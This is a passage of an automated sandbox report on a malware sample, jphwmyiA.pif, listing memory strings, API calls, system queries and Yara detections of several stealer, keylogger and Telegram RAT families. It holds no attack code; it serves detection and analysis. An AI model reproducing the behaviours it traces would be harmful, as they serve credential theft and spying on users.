                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPn[!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlTM
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`C
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL&Y!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlSk
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`>
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8k@
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`g
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q49e!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,S=
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`p
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qp4E!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`n
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8l0
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`uX!
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`V
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@|?
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,T-
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`8`
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q``
                  Source: jphwmyiA.pif, 00000013.00000002.3759044555.0000000022971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`^
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8m!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`?,!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q ]f!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@}/
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT ]
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh'e!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.000000002164A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qlog!
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL=#!
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT!I
                  Source: jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C34E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd@w
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,7_2_027B5A78
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: GetLocaleInfoA,7_2_027BA744
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: GetLocaleInfoA,7_2_027BA790
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,7_2_027B5B84
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: GetLocaleInfoA,10_2_00417A20
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_028B5A78
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: GetLocaleInfoA,12_2_028BA790
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_028B5B83
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: GetLocaleInfoA,15_2_00417A20
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027B918C GetLocalTime,7_2_027B918C
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_027BB70C GetVersionExA,7_2_027BB70C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
